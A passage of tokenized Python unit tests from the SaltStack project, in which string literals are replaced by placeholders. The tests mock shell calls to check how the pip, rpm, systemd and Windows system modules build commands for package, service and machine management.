uninstall , <EOL> pkg , <EOL> log = log_path <EOL> ) <EOL> def test_uninstall_timeout_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> expected_prefix = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( pkg , timeout = <NUM_LIT:10> ) <EOL> mock . assert_called_once_with ( <EOL> expected_prefix + [ <NUM_LIT:10> , pkg ] , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> pip . uninstall ( pkg , timeout = '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( <EOL> expected_prefix + [ '<STR_LIT>' , pkg ] , <EOL> cwd = None , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> ValueError , <EOL> pip . uninstall , <EOL> pkg , <EOL> timeout = '<STR_LIT:a>' <EOL> ) <EOL> def test_freeze_command ( self ) : <EOL> eggs = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> mock = MagicMock ( <EOL> return_value = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT:\n>' . join ( eggs ) <EOL> } <EOL> ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret = pip . freeze ( ) <EOL> mock . 
assert_called_once_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = None , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> self . assertEqual ( ret , eggs ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . freeze , <EOL> ) <EOL> def test_list_command ( self ) : <EOL> eggs = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> mock_version = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT:\n>' . join ( eggs ) } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch ( '<STR_LIT>' , <EOL> MagicMock ( return_value = mock_version ) ) : <EOL> ret = pip . list_ ( ) <EOL> mock . assert_called_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = None , <EOL> runas = None , <EOL> python_shell = False , <EOL> ) <EOL> self . assertEqual ( <EOL> ret , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : mock_version , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> ) <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch ( '<STR_LIT>' , <EOL> MagicMock ( return_value = '<STR_LIT>' ) ) : <EOL> self . assertRaises ( <EOL> CommandExecutionError , <EOL> pip . list_ , <EOL> ) <EOL> def test_list_command_with_prefix ( self ) : <EOL> eggs = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> mock = MagicMock ( <EOL> return_value = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT:\n>' . 
join ( eggs ) <EOL> } <EOL> ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> ret = pip . list_ ( prefix = '<STR_LIT>' ) <EOL> mock . assert_called_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> cwd = None , <EOL> runas = None , <EOL> python_shell = False , <EOL> ) <EOL> self . assertEqual ( <EOL> ret , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ) <EOL> def test_install_pre_argument_in_resulting_command ( self ) : <EOL> pkg = '<STR_LIT>' <EOL> mock = MagicMock ( side_effect = [ <EOL> { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } <EOL> ] ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch ( '<STR_LIT>' , <EOL> MagicMock ( return_value = '<STR_LIT>' ) ) : <EOL> pip . install ( pkg , pre_releases = True ) <EOL> mock . assert_called_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> mock_run = MagicMock ( return_value = '<STR_LIT>' ) <EOL> mock_run_all = MagicMock ( return_value = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> with patch . dict ( pip . __salt__ , { '<STR_LIT>' : mock_run , <EOL> '<STR_LIT>' : mock_run_all } ) : <EOL> with patch ( '<STR_LIT>' , <EOL> MagicMock ( return_value = '<STR_LIT>' ) ) : <EOL> pip . install ( pkg , pre_releases = True ) <EOL> mock_run_all . assert_called_with ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , pkg ] , <EOL> saltenv = '<STR_LIT>' , <EOL> runas = None , <EOL> use_vt = False , <EOL> python_shell = False , <EOL> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( PipTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> from salttesting . helpers import ensure_in_syspath <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import rpm <EOL> rpm . __salt__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class RpmTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_list_pkgs ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . list_pkgs ( ) , { } ) <EOL> def test_verify ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . verify ( '<STR_LIT>' ) , { } ) <EOL> def test_file_list ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . file_list ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } ) <EOL> def test_file_dict ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . file_dict ( '<STR_LIT>' ) , <EOL> { '<STR_LIT>' : [ ] , '<STR_LIT>' : { } } ) <EOL> def test_owner ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . assertEqual ( rpm . owner ( ) , '<STR_LIT>' ) <EOL> ret = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = ret ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( rpm . 
owner ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> ret = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> with patch . dict ( rpm . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( rpm . owner ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ret ) <EOL> @ patch ( '<STR_LIT>' , True ) <EOL> def test_version_cmp_rpm ( self ) : <EOL> '''<STR_LIT>''' <EOL> rpm . rpm = MagicMock ( return_value = MagicMock ) <EOL> with patch ( '<STR_LIT>' , MagicMock ( return_value = <NUM_LIT:0> ) ) : <EOL> self . assertEqual ( <NUM_LIT:0> , rpm . version_cmp ( '<STR_LIT:1>' , '<STR_LIT:2>' ) ) <EOL> @ patch ( '<STR_LIT>' , False ) <EOL> def test_version_cmp_fallback ( self ) : <EOL> '''<STR_LIT>''' <EOL> rpm . rpm = MagicMock ( return_value = MagicMock ) <EOL> with patch ( '<STR_LIT>' , MagicMock ( return_value = <NUM_LIT:0> ) ) : <EOL> self . assertEqual ( - <NUM_LIT:1> , rpm . version_cmp ( '<STR_LIT:1>' , '<STR_LIT:2>' ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( RpmTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import os <EOL> from salt . exceptions import CommandExecutionError <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import systemd <EOL> systemd . __salt__ = { } <EOL> systemd . __context__ = { } <EOL> _SYSTEMCTL_STATUS = { <EOL> '<STR_LIT>' : '''<STR_LIT>''' , <EOL> '<STR_LIT>' : '''<STR_LIT>''' <EOL> } <EOL> _LIST_UNIT_FILES = '''<STR_LIT>''' <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class SystemdTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_systemctl_reload ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> } , <EOL> ] ) <EOL> with patch . dict ( systemd . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertRaisesRegexp ( <EOL> CommandExecutionError , <EOL> '<STR_LIT>' , <EOL> systemd . systemctl_reload <EOL> ) <EOL> self . assertTrue ( systemd . systemctl_reload ( ) ) <EOL> def test_get_enabled ( self ) : <EOL> '''<STR_LIT>''' <EOL> cmd_mock = MagicMock ( return_value = _LIST_UNIT_FILES ) <EOL> listdir_mock = MagicMock ( return_value = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> sd_mock = MagicMock ( <EOL> return_value = set ( <EOL> [ x . replace ( '<STR_LIT>' , '<STR_LIT>' ) for x in _SYSTEMCTL_STATUS ] <EOL> ) <EOL> ) <EOL> access_mock = MagicMock ( <EOL> side_effect = lambda x , y : x != os . path . join ( <EOL> systemd . 
INITSCRIPT_PATH , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) <EOL> sysv_enabled_mock = MagicMock ( side_effect = lambda x : x == '<STR_LIT>' ) <EOL> with patch . dict ( systemd . __salt__ , { '<STR_LIT>' : cmd_mock } ) : <EOL> with patch . object ( os , '<STR_LIT>' , listdir_mock ) : <EOL> with patch . object ( systemd , '<STR_LIT>' , sd_mock ) : <EOL> with patch . object ( os , '<STR_LIT>' , side_effect = access_mock ) : <EOL> with patch . object ( systemd , '<STR_LIT>' , <EOL> sysv_enabled_mock ) : <EOL> self . assertListEqual ( <EOL> systemd . get_enabled ( ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_get_disabled ( self ) : <EOL> '''<STR_LIT>''' <EOL> cmd_mock = MagicMock ( return_value = _LIST_UNIT_FILES ) <EOL> listdir_mock = MagicMock ( return_value = [ '<STR_LIT:foo>' , '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> sd_mock = MagicMock ( <EOL> return_value = set ( <EOL> [ x . replace ( '<STR_LIT>' , '<STR_LIT>' ) for x in _SYSTEMCTL_STATUS ] <EOL> ) <EOL> ) <EOL> access_mock = MagicMock ( <EOL> side_effect = lambda x , y : x != os . path . join ( <EOL> systemd . INITSCRIPT_PATH , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) <EOL> sysv_enabled_mock = MagicMock ( side_effect = lambda x : x == '<STR_LIT>' ) <EOL> with patch . dict ( systemd . __salt__ , { '<STR_LIT>' : cmd_mock } ) : <EOL> with patch . object ( os , '<STR_LIT>' , listdir_mock ) : <EOL> with patch . object ( systemd , '<STR_LIT>' , sd_mock ) : <EOL> with patch . object ( os , '<STR_LIT>' , side_effect = access_mock ) : <EOL> with patch . object ( systemd , '<STR_LIT>' , <EOL> sysv_enabled_mock ) : <EOL> self . assertListEqual ( <EOL> systemd . 
get_disabled ( ) , <EOL> [ '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_get_all ( self ) : <EOL> '''<STR_LIT>''' <EOL> listdir_mock = MagicMock ( side_effect = [ <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ] ) <EOL> access_mock = MagicMock ( <EOL> side_effect = lambda x , y : x != os . path . join ( <EOL> systemd . INITSCRIPT_PATH , <EOL> '<STR_LIT>' <EOL> ) <EOL> ) <EOL> with patch . object ( os , '<STR_LIT>' , listdir_mock ) : <EOL> with patch . object ( os , '<STR_LIT>' , side_effect = access_mock ) : <EOL> self . assertListEqual ( <EOL> systemd . get_all ( ) , <EOL> [ '<STR_LIT:bar>' , '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> ) <EOL> def test_available ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = lambda x : _SYSTEMCTL_STATUS [ x ] ) <EOL> with patch . object ( systemd , '<STR_LIT>' , mock ) : <EOL> self . assertTrue ( systemd . available ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( systemd . available ( '<STR_LIT>' ) ) <EOL> def test_missing ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = lambda x : _SYSTEMCTL_STATUS [ x ] ) <EOL> with patch . object ( systemd , '<STR_LIT>' , mock ) : <EOL> self . assertFalse ( systemd . missing ( '<STR_LIT>' ) ) <EOL> self . assertTrue ( systemd . missing ( '<STR_LIT>' ) ) <EOL> def test_show ( self ) : <EOL> '''<STR_LIT>''' <EOL> show_output = '<STR_LIT>' <EOL> mock = MagicMock ( return_value = show_output ) <EOL> with patch . dict ( systemd . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( <EOL> systemd . 
show ( '<STR_LIT>' ) , <EOL> { '<STR_LIT:a>' : '<STR_LIT:b>' , <EOL> '<STR_LIT:c>' : '<STR_LIT:d>' , <EOL> '<STR_LIT:e>' : { '<STR_LIT:f>' : '<STR_LIT:g>' , '<STR_LIT:h>' : '<STR_LIT:i>' } , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } <EOL> ) <EOL> def test_execs ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> with patch . object ( systemd , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = { '<STR_LIT>' : { '<STR_LIT:path>' : '<STR_LIT:c>' } } ) <EOL> with patch . object ( systemd , '<STR_LIT>' , mock ) : <EOL> self . assertDictEqual ( systemd . execs ( ) , { '<STR_LIT:a>' : '<STR_LIT:c>' , '<STR_LIT:b>' : '<STR_LIT:c>' } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from integration import run_tests <EOL> run_tests ( SystemdTestCase , needs_daemon = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> from datetime import datetime <EOL> from salttesting import TestCase , skipIf <EOL> from salttesting . helpers import ensure_in_syspath <EOL> from salttesting . mock import ( <EOL> MagicMock , <EOL> patch , <EOL> NO_MOCK , <EOL> NO_MOCK_REASON <EOL> ) <EOL> ensure_in_syspath ( '<STR_LIT>' ) <EOL> from salt . modules import win_system <EOL> try : <EOL> import win32net <EOL> import win32api <EOL> import pywintypes <EOL> from ctypes import windll <EOL> HAS_WIN32NET_MODS = True <EOL> except ImportError : <EOL> HAS_WIN32NET_MODS = False <EOL> win_system . __salt__ = { } <EOL> @ skipIf ( NO_MOCK , NO_MOCK_REASON ) <EOL> class WinSystemTestCase ( TestCase ) : <EOL> '''<STR_LIT>''' <EOL> def test_halt ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertEqual ( win_system . halt ( ) , '<STR_LIT>' ) <EOL> def test_init ( self ) : <EOL> '''<STR_LIT>''' <EOL> self . assertEqual ( win_system . init ( <NUM_LIT:3> ) , <EOL> '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_poweroff ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertEqual ( win_system . poweroff ( ) , '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_reboot ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . reboot ( ) , '<STR_LIT>' ) <EOL> mock . 
assert_called_once_with ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , python_shell = False ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_reboot_with_timeout_in_minutes ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . reboot ( <NUM_LIT:5> , in_seconds = False ) , '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , python_shell = False ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_reboot_with_timeout_in_seconds ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . reboot ( <NUM_LIT:5> , in_seconds = True ) , '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:5>' ] , python_shell = False ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_reboot_with_wait ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> sleep_mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> with patch ( '<STR_LIT>' , sleep_mock ) : <EOL> self . assertEqual ( win_system . reboot ( wait_for_reboot = True ) , '<STR_LIT>' ) <EOL> mock . assert_called_once_with ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , python_shell = False ) <EOL> sleep_mock . assert_called_once_with ( <NUM_LIT> ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_shutdown ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . 
shutdown ( ) , '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_shutdown_hard ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . shutdown_hard ( ) , '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_set_computer_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ { '<STR_LIT>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : True } , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ] ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . object ( win_system , <EOL> '<STR_LIT>' , mock ) : <EOL> self . assertDictEqual ( win_system . set_computer_name ( "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True } } ) <EOL> self . assertFalse ( win_system . set_computer_name ( "<STR_LIT>" ) ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_get_pending_computer_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = '<STR_LIT>' ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertFalse ( win_system . get_pending_computer_name ( ) ) <EOL> self . assertEqual ( win_system . get_pending_computer_name ( ) , <EOL> '<STR_LIT>' ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_get_computer_name ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . 
__salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . get_computer_name ( ) , '<STR_LIT>' ) <EOL> self . assertFalse ( win_system . get_computer_name ( ) ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_set_computer_desc ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> mock = MagicMock ( return_value = "<STR_LIT>" ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertDictEqual ( win_system . set_computer_desc ( <EOL> "<STR_LIT>" <EOL> ) , <EOL> { '<STR_LIT>' : "<STR_LIT>" } ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_get_computer_desc ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertEqual ( win_system . get_computer_desc ( ) , '<STR_LIT>' ) <EOL> self . assertFalse ( win_system . get_computer_desc ( ) ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_join_domain ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ { '<STR_LIT>' : True } , <EOL> { '<STR_LIT>' : True } ] ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertDictEqual ( win_system . join_domain ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertFalse ( win_system . join_domain ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) ) <EOL> def test_get_system_time ( self ) : <EOL> '''<STR_LIT>''' <EOL> tm = datetime . strftime ( datetime . now ( ) , "<STR_LIT>" ) <EOL> win_tm = win_system . get_system_time ( ) <EOL> try : <EOL> self . assertEqual ( win_tm , tm ) <EOL> except AssertionError : <EOL> import re <EOL> self . assertTrue ( re . 
search ( r'<STR_LIT>' , win_tm ) ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_set_system_time ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ False , True ] ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertFalse ( win_system . set_system_time ( "<STR_LIT>" ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertFalse ( win_system . set_system_time ( "<STR_LIT>" ) ) <EOL> def test_get_system_date ( self ) : <EOL> '''<STR_LIT>''' <EOL> date = datetime . strftime ( datetime . now ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( win_system . get_system_date ( ) , date ) <EOL> @ skipIf ( not HAS_WIN32NET_MODS , '<STR_LIT>' ) <EOL> def test_set_system_date ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( side_effect = [ False , True ] ) <EOL> with patch . object ( win_system , '<STR_LIT>' , mock ) : <EOL> self . assertFalse ( win_system . set_system_date ( "<STR_LIT>" ) ) <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertFalse ( win_system . set_system_date ( "<STR_LIT>" ) ) <EOL> def test_start_time_service ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( win_system . start_time_service ( ) ) <EOL> def test_stop_time_service ( self ) : <EOL> '''<STR_LIT>''' <EOL> mock = MagicMock ( return_value = True ) <EOL> with patch . dict ( win_system . __salt__ , { '<STR_LIT>' : mock } ) : <EOL> self . assertTrue ( win_system . stop_time_service ( ) ) <EOL> def test_set_hostname ( self ) : <EOL> '''<STR_LIT>''' <EOL> cmd_run_mock = MagicMock ( return_value = "<STR_LIT>" ) <EOL> get_hostname = MagicMock ( return_value = "<STR_LIT>" ) <EOL> with patch . dict ( win_system . 
